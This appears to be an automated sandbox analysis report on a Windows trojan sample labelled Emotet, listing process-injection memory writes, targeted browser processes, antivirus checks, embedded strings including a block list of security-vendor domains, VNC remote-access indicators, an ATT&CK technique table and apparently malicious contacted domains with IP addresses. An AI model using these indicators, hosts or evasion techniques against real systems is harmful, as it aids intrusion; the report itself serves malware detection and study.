Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 1022000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 880000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 881000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 882000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 8D2000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: A50000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: A51000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: A52000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: AA2000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: DF0000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: DF1000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: DF2000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: E42000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: E90000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: E91000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: E92000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: EE2000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 9F0000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 9F1000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 9F2000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: A42000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 1460000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 1461000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 1462000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 14B2000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 13A0000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 13A1000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 13A2000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 13F2000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 15D0000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 15D1000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 15D2000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 1622000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 1380000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 1381000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 1382000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 13D2000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 620000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 621000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 622000Jump to behavior
Source: C:\Windows\apppatch\svchost.exe Code function: CreateToolhelp32Snapshot,Process32First,EnterCriticalSection,GetCurrentProcessId,StrStrIA,EnterCriticalSection,GetProcessHeap,HeapAlloc,LeaveCriticalSection,Process32Next,GetHandleInformation,CloseHandle, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|2_2_02C86370
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe Code function: CreateToolhelp32Snapshot,Process32First,EnterCriticalSection,GetCurrentProcessId,StrStrIA,EnterCriticalSection,GetProcessHeap,HeapAlloc,LeaveCriticalSection,Process32Next,GetHandleInformation,CloseHandle, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|6_2_01256370
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe Code function: CreateToolhelp32Snapshot,Process32First,EnterCriticalSection,GetCurrentProcessId,StrStrIA,EnterCriticalSection,GetProcessHeap,HeapAlloc,LeaveCriticalSection,Process32Next,GetHandleInformation,CloseHandle, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|7_2_01056370
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe Code function: CreateToolhelp32Snapshot,Process32First,EnterCriticalSection,GetCurrentProcessId,StrStrIA,EnterCriticalSection,GetProcessHeap,HeapAlloc,LeaveCriticalSection,Process32Next,GetHandleInformation,CloseHandle, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|9_2_00A36370
Source: C:\Users\user\Desktop\UMwpXhA46R.exe File opened: CA HIPS KmxAgent
Source: C:\Users\user\Desktop\UMwpXhA46R.exe File opened: Agnitum Outpost firewal \pipe\acsipc_server
Source: C:\Users\user\Desktop\UMwpXhA46R.exe File opened: Webroot PREVX C:\ProgramData\PrevxCSI\csidb.csi
Source: C:\Users\user\Desktop\UMwpXhA46R.exe File opened: AVG C:\Program Files (x86)\AVG\AVG9\dfncfg.dat
Source: C:\Users\user\Desktop\UMwpXhA46R.exe Window found: AVP NULL ____AVP.Root
Source: C:\Windows\apppatch\svchost.exe File opened: CA HIPS KmxAgent
Source: C:\Windows\apppatch\svchost.exe File opened: Agnitum Outpost firewal \pipe\acsipc_server
Source: C:\Windows\apppatch\svchost.exe File opened: Webroot PREVX C:\ProgramData\PrevxCSI\csidb.csi
Source: C:\Windows\apppatch\svchost.exe File opened: AVG C:\Program Files (x86)\AVG\AVG9\dfncfg.dat
Source: C:\Windows\apppatch\svchost.exe Window found: AVP NULL ____AVP.Root
Source: PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000006.00000000.2516842458.0000000001670000.00000002.00000001.00040000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000007.00000000.2519141431.0000000001470000.00000002.00000001.00040000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000009.00000000.2521690463.0000000000E50000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: IProgram Manager
Source: UMwpXhA46R.exe, UMwpXhA46R.exe, 00000000.00000003.2148607507.0000000000703000.00000004.00000020.00020000.00000000.sdmp, UMwpXhA46R.exe, 00000000.00000002.2153786552.0000000000400000.00000040.00000001.01000000.00000005.sdmp, svchost.exe, svchost.exe, 00000002.00000003.2776615679.0000000000B00000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: Shell_TrayWnd
Source: PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000006.00000000.2516842458.0000000001670000.00000002.00000001.00040000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000007.00000000.2519141431.0000000001470000.00000002.00000001.00040000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000009.00000000.2521690463.0000000000E50000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
Source: PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000006.00000000.2516842458.0000000001670000.00000002.00000001.00040000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000007.00000000.2519141431.0000000001470000.00000002.00000001.00040000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000009.00000000.2521690463.0000000000E50000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
Source: UMwpXhA46R.exe, 00000000.00000003.2148607507.0000000000703000.00000004.00000020.00020000.00000000.sdmp, UMwpXhA46R.exe, 00000000.00000002.2153786552.0000000000400000.00000040.00000001.01000000.00000005.sdmp, svchost.exe, 00000002.00000003.2776615679.0000000000B00000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: avast.comkasperskydrwebeset.comantiviraviravirustotalvirusinfoz-oleg.comtrendsecureanti-malware.comodo.comavast.comkasperskydrwebeset.comantiviraviravirustotalvirusinfoz-oleg.comtrendsecureanti-malware.comodo.comgoogle.comgoogle.comDnsapi.dllDnsQuery_ADnsQuery_UTF8DnsQuery_WQuery_Mainws2_32.dllgetaddrinfogethostbynameinet_addrqwrtpsdfghjklzxcvbnmeyuioa1676d5775e05c50b46baa5579d4fc7;%s%sMozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)/login.php6908741AF4E26C68E1EE46F1041F009EECA931D2D53E11AD04CF03DEB7677754725005219D4B978D957ABA1678D353DE5AA0586B49E21F7EFFE2F73D7D2D8E26395286E1EA7A106CD617966D9FC5906C6E952289B4D671BA6ADE1B80ECF2468552F401D4D8134CAF4B56DC5F18B673710974A6F7A9AE9273979C092F52E8D7C9100016d3ad29879a90b4dd1b4f76e82166ca3\*.*...\ntdll.dllZwQuerySystemInformationGlobal\{EAF799BF-8249-4fe1-9A0D-92CD3CC22014}Global\{EAF799BF-8449-4fe1-9A0D-95CD39DC2014}fuckGlobal\HighMemoryEvent_%08xc:\windowsc:\windows\explorer.exeShell_TrayWnd
Source: C:\Users\user\Desktop\UMwpXhA46R.exe Code function: 0_2_00412FF0 cpuid 0_2_00412FF0
Source: C:\Windows\apppatch\svchost.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate
Source: C:\Users\user\Desktop\UMwpXhA46R.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\apppatch\svchost.exe Queries volume information: C:\ VolumeInformation
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\UMwpXhA46R.exe Code function: 0_2_00402240 CreateFileA,WriteFile,WriteFile,GetSystemTimeAsFileTime,WriteFile,CloseHandle,0_2_00402240
Source: C:\Users\user\Desktop\UMwpXhA46R.exe Code function: 0_2_00403900 RegOpenKeyExA,RegQueryValueExA,RegCloseKey,RegCloseKey,GetUserNameA,CharUpperA,strstr,strstr,strstr,strstr,GetSystemWindowsDirectoryA,GetVolumeInformationA,GetModuleFileNameA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,0_2_00403900
Source: C:\Windows\apppatch\svchost.exe Code function: 2_2_02C74920 PathAddBackslashA,CreateFileA,WriteFile,WriteFile,WriteFile,WriteFile,GetModuleFileNameA,WriteFile,WriteFile,WriteFile,GetUserNameA,WriteFile,WriteFile,WriteFile,GetEnvironmentVariableA,WriteFile,WriteFile,WriteFile,GetSystemDefaultLangID,memset,WriteFile,WriteFile,WriteFile,GetDC,GetDeviceCaps,GetSystemMetrics,GetSystemMetrics,_snprintf,WriteFile,WriteFile,WriteFile,GetDateFormatA,WriteFile,WriteFile,WriteFile,GetTimeFormatA,WriteFile,WriteFile,WriteFile,GetTimeZoneInformation,_snprintf,WriteFile,WriteFile,WriteFile,WriteFile,WriteFile,WriteFile,GetSystemWindowsDirectoryA,WriteFile,WriteFile,WriteFile,WriteFile,IsUserAnAdmin,IsUserAnAdmin,WriteFile,WriteFile,GetHandleInformation,CloseHandle,2_2_02C74920
Source: C:\Users\user\Desktop\UMwpXhA46R.exe Code function: 0_2_004033A0 GetVersionExA,GetCurrentProcess,OpenProcessToken,GetTokenInformation,CloseHandle,0_2_004033A0

Remote Access Functionality

Source: UMwpXhA46R.exe String found in binary or memory: RFB 003.006
Source: svchost.exe String found in binary or memory: RFB 003.006
Source: PMnAVsjMPucERAKEWNFImySCFHoLk.exe String found in binary or memory: RFB 003.006
Source: C:\Windows\apppatch\svchost.exe Code function: 2_2_02C888F0 WSAStartup,ExitThread,socket,ExitThread,htons,htons,htons,bind,ExitThread,listen,ExitThread,gethostname,gethostbyname,inet_ntoa,accept,accept,getpeername,inet_ntoa,htons,CreateThread,CloseHandle,accept,ExitThread,closesocket,ExitThread,2_2_02C888F0
Source: C:\Windows\apppatch\svchost.exe Code function: 2_2_02C9E6D0 setsockopt,htons,socket,setsockopt,bind,2_2_02C9E6D0
Source: C:\Windows\apppatch\svchost.exe Code function: 2_2_02C9F4A0 htons,socket,setsockopt,closesocket,bind,listen,2_2_02C9F4A0
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe Code function: 6_2_012588F0 WSAStartup,ExitThread,socket,ExitThread,htons,htons,htons,bind,ExitThread,listen,ExitThread,gethostname,gethostbyname,inet_ntoa,accept,accept,getpeername,inet_ntoa,htons,CreateThread,CloseHandle,accept,ExitThread,closesocket,ExitThread,6_2_012588F0
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe Code function: 6_2_0126F4A0 htons,socket,setsockopt,closesocket,bind,listen,6_2_0126F4A0
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe Code function: 6_2_0126E6D0 setsockopt,htons,socket,setsockopt,bind,6_2_0126E6D0
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe Code function: 7_2_010588F0 WSAStartup,ExitThread,socket,ExitThread,htons,htons,htons,bind,ExitThread,listen,ExitThread,gethostname,gethostbyname,inet_ntoa,accept,accept,getpeername,inet_ntoa,htons,CreateThread,CloseHandle,accept,ExitThread,closesocket,ExitThread,7_2_010588F0
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe Code function: 7_2_0106F4A0 htons,socket,setsockopt,closesocket,bind,listen,7_2_0106F4A0
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe Code function: 7_2_0106E6D0 setsockopt,htons,socket,setsockopt,bind,7_2_0106E6D0
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe Code function: 9_2_00A388F0 WSAStartup,ExitThread,socket,ExitThread,htons,htons,htons,bind,ExitThread,listen,ExitThread,gethostname,gethostbyname,inet_ntoa,accept,accept,getpeername,inet_ntoa,htons,CreateThread,CloseHandle,accept,ExitThread,closesocket,ExitThread,9_2_00A388F0
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe Code function: 9_2_00A4F4A0 htons,socket,setsockopt,closesocket,bind,listen,9_2_00A4F4A0
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe Code function: 9_2_00A4E6D0 setsockopt,htons,socket,setsockopt,bind,9_2_00A4E6D0

| Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
| --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- |
| Gather Victim Identity Information | Acquire Infrastructure | 1 Valid Accounts | 22 Native API | 1 DLL Side-Loading | 1 Abuse Elevation Control Mechanism | 1 Disable or Modify Tools | 111 Input Capture | 2 System Time Discovery | 1 Remote Desktop Protocol | 1 Archive Collected Data | 4 Ingress Tool Transfer | Exfiltration Over Other Network Medium | Abuse Accessibility Features |
| Credentials | Domains | Default Accounts | 2 Command and Scripting Interpreter | 1 Create Account | 1 DLL Side-Loading | 1 Abuse Elevation Control Mechanism | LSASS Memory | 11 Account Discovery | Remote Desktop Protocol | 1 Screen Capture | 11 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service |
| Email Addresses | DNS Server | Domain Accounts | 1 Scheduled Task/Job | 1 Valid Accounts | 1 Valid Accounts | 1 Obfuscated Files or Information | Security Account Manager | 1 System Network Connections Discovery | SMB/Windows Admin Shares | 111 Input Capture | 11 Non-Standard Port | Automated Exfiltration | Data Encrypted for Impact |
| Employee Names | Virtual Private Server | Local Accounts | Cron | 1 Scheduled Task/Job | 1 Access Token Manipulation | 31 Software Packing | NTDS | 2 File and Directory Discovery | Distributed Component Object Model | 2 Clipboard Data | 1 Remote Access Software | Traffic Duplication | Data Destruction |
| Gather Victim Network Information | Server | Cloud Accounts | Launchd | 1 Registry Run Keys / Startup Folder | 613 Process Injection | 1 DLL Side-Loading | LSA Secrets | 143 System Information Discovery | SSH | Keylogging | 3 Non-Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact |
| Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | 1 Bootkit | 1 Scheduled Task/Job | 322 Masquerading | Cached Domain Credentials | 1 Query Registry | VNC | GUI Input Capture | 14 Application Layer Protocol | Data Transfer Size Limits | Service Stop |
| DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | 1 Registry Run Keys / Startup Folder | 1 Valid Accounts | DCSync | 351 Security Software Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery |
| Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 1 Access Token Manipulation | Proc Filesystem | 151 Virtualization/Sandbox Evasion | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement |
| Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 151 Virtualization/Sandbox Evasion | /etc/passwd and /etc/shadow | 13 Process Discovery | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement |
| IP Addresses | Compromise Infrastructure | Supply Chain Compromise | PowerShell | Cron | Cron | 613 Process Injection | Network Sniffing | 11 Application Window Discovery | Shared Webroot | Local Data Staging | File Transfer Protocols | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | External Defacement |
| Network Security Appliances | Domains | Compromise Software Dependencies and Development Tools | AppleScript | Launchd | Launchd | 1 Bootkit | Input Capture | 1 System Owner/User Discovery | Software Deployment Tools | Remote Data Staging | Mail Protocols | Exfiltration Over Unencrypted Non-C2 Protocol | Firmware Corruption |

[Behavior graph. ID: 1553852; Sample: UMwpXhA46R.exe; Startdate: 11/11/2024; Architecture: WINDOWS; Score: 100]

| Source | Detection | Scanner | Label | Link |
| --- | --- | --- | --- | --- |
| UMwpXhA46R.exe | 82% | ReversingLabs | Win32.Trojan.Emotet | |
| UMwpXhA46R.exe | 100% | Avira | TR/Crypt.XPACK.Gen | |
| UMwpXhA46R.exe | 100% | Joe Sandbox ML | | |
No Antivirus matches
No Antivirus matches
No Antivirus matches
| Source | Detection | Scanner | Label | Link |
| Name | IP | Active | Malicious | Antivirus Detection | Reputation |
                                        truefalse
                                          high
                                          lygynud.com
                                          3.94.10.34
                                          truefalse
                                            high
                                            gahyqah.com
                                            23.253.46.64
                                            truefalse
                                              high
                                              sedoparking.com
                                              64.190.63.136
                                              truefalse
                                                high
                                                vocyzit.com
                                                44.221.84.105
                                                truefalse
                                                  high
                                                  galyqaz.com
                                                  199.191.50.83
                                                  truefalse
                                                    high
                                                    vofycot.com
                                                    103.224.182.252
                                                    truefalse
                                                      high
                                                      qetyhyg.com
                                                      64.225.91.73
                                                      truefalse
                                                        high
                                                        gahyhiz.com
                                                        44.221.84.105
                                                        truefalse
                                                          high
                                                          qetyfuv.com
                                                          44.221.84.105
                                                          truefalse
                                                            high
                                                            gtm-sg-6l13ukk0m05.qu200.com
                                                            103.150.10.48
                                                            truefalse
                                                              high
                                                              lymyxid.com
                                                              3.94.10.34
                                                              truefalse
                                                                high
                                                                qegyval.com
                                                                154.85.183.50
                                                                truefalse
                                                                  high
                                                                  gatyzoz.com
                                                                  unknown
                                                                  unknownfalse
                                                                    high
                                                                    lykygaj.com
                                                                    unknown
                                                                    unknownfalse
                                                                      high
                                                                      qedyxel.com
                                                                      unknown
                                                                      unknownfalse
                                                                        high
                                                                        qedyqup.com
                                                                        unknown
                                                                        unknownfalse
                                                                          high
                                                                          qekyluv.com
                                                                          unknown
                                                                          unknownfalse
                                                                            high
                                                                            gatyrez.com
                                                                            unknown
